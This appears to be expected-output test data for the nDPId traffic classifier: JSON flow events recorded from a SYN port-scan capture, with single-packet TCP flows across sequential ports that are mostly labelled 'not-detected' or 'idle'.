+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1070,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":448,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1070,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":207,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1072,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":744,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1071,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1071,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1073,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":175,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058221,"flow_last_seen":1278275058221,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1074,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1073,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":199,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058345,"flow_last_seen":1278275058345,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1073,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1074,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1721,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1074,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1075,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1076,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060698,"flow_last_seen":1278275060698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1075,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058156,"flow_last_seen":1278275058156,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1075,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1076,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1333,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060492,"flow_last_seen":1278275060492,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1077,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":748,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059632,"flow_last_seen":1278275059632,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1078,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":771,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059676,"flow_last_seen":1278275059676,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1831,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061158,"flow_last_seen":1278275061158,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00644{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"SOCKS","breed":"Acceptable","category":"Web"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1694,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061002,"flow_last_seen":1278275061002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1079,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":826,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1079,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":618,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059456,"flow_last_seen":1278275059456,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":54328,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00649{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061260,"flow_last_seen":1278275061260,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3128,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
